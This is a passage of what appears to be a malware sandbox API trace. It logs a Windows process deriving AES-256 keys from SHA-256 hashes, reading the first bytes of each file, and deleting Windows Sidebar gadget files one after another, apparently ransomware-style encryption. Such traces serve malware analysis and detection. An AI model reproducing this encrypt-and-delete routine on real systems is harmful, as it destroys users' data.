hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.483] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.483] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.483] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xaa6 [0186.483] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.485] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.485] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.485] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.487] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_orange.png")) returned 0 [0186.488] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.488] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.489] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.489] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.489] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd6 [0186.489] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.490] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.490] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.490] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.491] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\corner.png")) returned 0 [0186.492] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.492] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.492] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.492] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.492] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3f8 [0186.493] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.495] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.495] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.495] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.496] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl-hot.png")) returned 0 [0186.497] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.498] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.498] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.498] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.498] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x380 [0186.498] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.500] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.500] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.500] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.501] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl.png")) returned 0 [0186.502] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.502] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.502] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.502] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.502] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x96 [0186.502] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.504] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.504] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.504] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.505] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\month.png")) returned 0 [0186.506] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.507] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.507] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.507] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.507] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1f6 [0186.507] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.509] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.509] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.509] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.510] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-desk.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-desk.png")) returned 0 [0186.511] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0186.511] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.511] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.511] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.511] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x14e [0186.511] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.513] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.513] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.513] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.514] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-dock.png")) returned 0 [0186.516] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0186.516] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0186.517] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.517] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0186.517] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1816 [0186.517] ReadFile (in: hFile=0x590, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0186.519] CryptDestroyHash (hHash=0x284d568) returned 1 [0186.519] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0186.520] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0186.521] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\logo.png")) returned 0 [0186.521] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.530] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0186.531] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0186.531] CryptHashData (hHash=0x284d5e8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.531] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0186.531] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5b85 [0186.531] ReadFile (in: hFile=0x584, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0186.534] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0186.534] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0186.534] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.535] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\drag.png")) returned 0 [0186.536] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.537] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.538] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.538] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.538] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.538] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x104c [0186.538] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.541] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.541] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.541] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.542] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\clock.html")) returned 0 [0186.543] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.544] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0186.545] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0186.545] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.545] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0186.545] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2a2 [0186.545] ReadFile (in: hFile=0x584, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0186.566] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0186.566] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0186.566] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.567] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\clock.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\clock.css")) returned 0 [0186.569] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0186.570] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0186.570] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.570] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d5a8) returned 1 [0186.570] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x55e [0186.570] ReadFile (in: hFile=0x598, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0186.586] CryptDestroyHash (hHash=0x284d668) returned 1 [0186.586] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0186.586] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.588] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\css\\settings.css")) returned 0 [0186.588] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.589] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.589] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.589] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0186.589] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3eb [0186.589] ReadFile (in: hFile=0x4ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.591] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.591] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0186.591] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.592] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml")) returned 0 [0186.593] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.593] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0186.593] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0186.593] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.594] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0186.594] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x467a [0186.594] ReadFile (in: hFile=0x4ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0186.604] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0186.604] CryptDestroyKey (hKey=0x284d528) returned 1 [0186.604] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.605] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\clock.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\clock.js")) returned 0 [0186.624] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0186.625] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0186.625] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.625] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0186.625] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5c4e [0186.625] ReadFile (in: hFile=0x598, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0186.650] CryptDestroyHash (hHash=0x284d668) returned 1 [0186.651] CryptDestroyKey (hKey=0x284d528) returned 1 [0186.651] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.652] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\settings.js")) returned 0 [0186.653] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0186.653] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0186.653] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.653] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d528) returned 1 [0186.653] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x258c [0186.654] ReadFile (in: hFile=0x4ac, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0186.657] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0186.657] CryptDestroyKey (hKey=0x284d528) returned 1 [0186.657] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.659] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\timeZones.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\js\\timezones.js")) returned 0 [0186.660] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.660] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.660] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.661] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0186.661] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2814 [0186.661] ReadFile (in: hFile=0x584, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.665] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0186.665] CryptDestroyKey (hKey=0x284d668) returned 1 [0186.665] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.667] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\en-us\\settings.html")) returned 0 [0186.667] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0186.668] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0186.668] CryptHashData (hHash=0x284d568, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.668] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0186.668] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e0c [0186.668] ReadFile (in: hFile=0x590, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0186.706] CryptDestroyHash (hHash=0x284d568) returned 1 [0186.706] CryptDestroyKey (hKey=0x284d528) returned 1 [0186.707] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0186.708] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\icon.png")) returned 0 [0186.729] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0186.732] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0186.732] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0186.732] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.732] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0186.732] GetFileSize (in: hFile=0x590, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6530 [0186.733] ReadFile (in: hFile=0x590, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0186.740] CryptDestroyHash (hHash=0x284d528) returned 1 [0186.740] 